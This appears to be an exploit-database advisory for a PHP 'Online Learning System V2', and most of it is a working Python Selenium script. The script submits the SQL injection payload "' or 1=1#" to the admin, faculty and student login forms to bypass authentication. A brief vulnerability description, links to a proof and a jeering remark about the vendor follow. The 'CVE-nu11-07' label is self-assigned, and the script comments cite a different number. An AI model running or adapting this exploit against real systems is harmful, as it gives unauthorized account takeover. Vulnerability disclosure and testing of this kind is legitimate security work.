Online Learning System 2 SQL Injection

`### Exploit Title0: eLearning V2(by: oretnom23) is vulnerable from remote  
SQL-Injection-Bypass-Authentication in three accounts.  
### Author: nu11secur1ty  
### Testing and Debugging: nu11secur1ty  
### Date: 09.06.2021  
### Vendor: https://www.sourcecodester.com/user/257130/activity  
### Link:  
https://www.sourcecodester.com/php/14929/online-learning-system-v2-using-php-free-source-code.html  
### CVE: CVE-nu11-07  
  
[+] Exploit Source:  
  
#!/usr/bin/python3  
# Author: @nu11secur1ty  
# Debug and Developement: @nu11secur1ty  
# CVE-nu11-05  
  
from selenium import webdriver  
import time  
import os  
from colorama import init, Fore, Back, Style  
init(convert=True)  
  
  
#enter the link to the website you want to automate login.  
### 0  
website_link0="http://localhost/elearning/admin/login.php"  
  
#enter your login username  
username0="nu11secur1ty' or 1=1#"  
  
#enter your login password  
password0="nu11secur1ty' or 1=1#"  
  
#enter the element for username input field  
element_for_username0="username"  
#enter the element for password input field  
element_for_password0="password"  
  
browser = webdriver.Chrome()  
browser.get((website_link0))  
  
  
try:  
### 0  
username_element = browser.find_element_by_name(element_for_username0)  
username_element.send_keys(username0)  
password_element = browser.find_element_by_name(element_for_password0)  
password_element.send_keys(password0)  
browser.maximize_window()  
time.sleep(1)  
browser.execute_script("document.querySelector('[class=\"btn btn-primary  
btn-block\"]').click()")  
  
time.sleep(5)  
  
### 1  
website_link1="http://localhost/elearning/faculty/login.php"  
  
#enter your login username  
username1="nu11secur1ty' or 1=1#"  
  
#enter your login password  
password1="nu11secur1ty' or 1=1#"  
  
#enter the element for username input field  
element_for_username1="faculty_id"  
#enter the element for password input field  
element_for_password1="password"  
  
browser = webdriver.Chrome()  
browser.get((website_link1))  
  
  
username_element = browser.find_element_by_name(element_for_username1)  
username_element.send_keys(username1)  
password_element = browser.find_element_by_name(element_for_password1)  
password_element.send_keys(password1)  
browser.maximize_window()  
time.sleep(1)  
browser.execute_script("document.querySelector('[class=\"btn btn-primary  
btn-block\"]').click()")  
  
time.sleep(5)  
  
### 2  
website_link2="http://localhost/elearning/student/login.php"  
  
#enter your login username  
username2="nu11secur1ty' or 1=1#"  
  
#enter your login password  
password2="nu11secur1ty' or 1=1#"  
  
#enter the element for username input field  
element_for_username2="student_id"  
#enter the element for password input field  
element_for_password2="password"  
  
browser = webdriver.Chrome()  
browser.get((website_link2))  
  
username_element = browser.find_element_by_name(element_for_username2)  
username_element.send_keys(username2)  
password_element = browser.find_element_by_name(element_for_password2)  
password_element.send_keys(password2)  
browser.maximize_window()  
time.sleep(1)  
browser.execute_script("document.querySelector('[class=\"btn btn-primary  
btn-block\"]').click()")  
  
print(Fore.RED + 'The payload for CVE-nu11-07 is deployed all account is  
PWNED by SQL - Injection...\n')  
print(Style.RESET_ALL)  
  
except Exception:  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")  
  
------------------------------------------------------------------  
  
### Description:  
The eLearning V2(by: oretnom23) is vulnerable from remote  
SQL-Injection-Bypass-Authentication in 3 accounts of the system (admin,  
Faculty & Student) in app /elearning/classes/Login.php.  
remote SQL-Injection-Bypass-Authentication:  
https://portswigger.net/support/using-sql-injection-to-bypass-authentication.  
  
The parameter (username, faculty_id, and student_id) from the login form is  
not protected correctly and there is no security and escaping from  
malicious payloads.  
When the user will sending a malicious query or malicious payload to the  
MySQL server for those three accounts, he can bypass the login credentials  
and take control of these accounts.  
  
-------------------------------------------------------------------  
### CONCLUSION: This vendor must STOP creating all these broken projects  
and vulnerable software programs, probably he is not a developer!  
  
### BR  
- [+] @nu11secur1ty System Administrator - Infrastructure and Penetration  
Testing Engineer  
  
-------------------------------------------------------------------  
### Reproduce:  
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-07  
### Proof: https://streamable.com/r8pl0l  
### BR nu11secur1ty  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://www.exploit-db.com/  
https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
`